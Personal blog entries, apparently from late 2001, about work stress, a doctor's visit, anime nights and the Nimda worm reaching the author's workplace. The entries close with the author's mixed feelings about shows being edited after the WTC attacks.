Today feels like it is going to be hellish. On the plus side, I’m doing dinner with my cousins. I’m really just getting to know them again, so it’s cool to be able to hang out with them. I think by the end of the day I will need to be able to unwind. I can feel that already my heart is racing. This really isn’t good, I need to find some way to burn off this stress.

Last night I had my first massage in about 3 or 4 months. It felt so good, but it made me realize how much I missed getting one. It was basicly a time that I could hit pause on life and try and relax. Here’s to relaxation.

So I had a regular appointment today with my Pulmonologist. One thing that was freaky is that my pulse rate was up around 133-135. So, I’m officially off of caffine for a little while, and I need to make sure I have some blood tests on my way home tonight. Of course the stress of everything at work probably isn’t helping my pulserate either. Hopefully I’ll be able to relax a bit later.

My hovercraft is full of eels.

Well, that bit of stuff in my log was once again a sign of a nasty little IIS Worm. This one was called nimda. It made an appearance at work and I spent most of the day dealing with it. We’ll see how tomorrow goes next.

So once again, there seems to be some kind program trying to hack into my system. And once again, the twits doing it don’t seem to realize that I am not running IIS. The thing is, I’m getting hits for this from a ton of machines. Anyone know of a new worm making the rounds? The hits look like this:

So tonight is anime night over at Gabe’s place. I’m hoping we can make it into a fairly regular thing so that I can show people full shows. One of my goals is to try and give people exposure to different types of shows. Most of the people who are going tonight tend to watch one kind of show. Primarily the more serious stuff which tends to be fairly violent. While I like this stuff, I’ve been having a growing admiration for other types of shows. I’ll admit it, I like Cardcaptor Sakura!
So it should be interesting tonight. I don’t plan on subjecting people to anything *too* cute.

I have such a headache today.
I want to go home.

So Saturday I was in a local computer store and I saw this kid of around 13 or 14 run up to his dad with some software box and was like, “Dad dad! I want to get this!”.
Dad says, “What is it?”
“It’s Linux.” answers the kid.
Dad says, “Linux? What is that? A game?”
The kid responds, “No Dad! It’s Linux. It’s *COOL*.”

At that point I kept on my way, but thought it was indeed cool.

So in reading the news there are more and more reports of how the entertainment industry is dealing with the WTC tragedy. Episodes of shows are being pulled for references to terrorist acts. The WTC is being edited out of movies that are in production. Some shows even have an uncertain future at all. I have really mixed feelings about this. I can understand holding off on episodes out of respect. But there’s a greater part of me that feels defiant. A part of me that feels that every time we let the actions of terrorists affect other parts of our lives we give them more power.
Anyone else have thoughts on this?
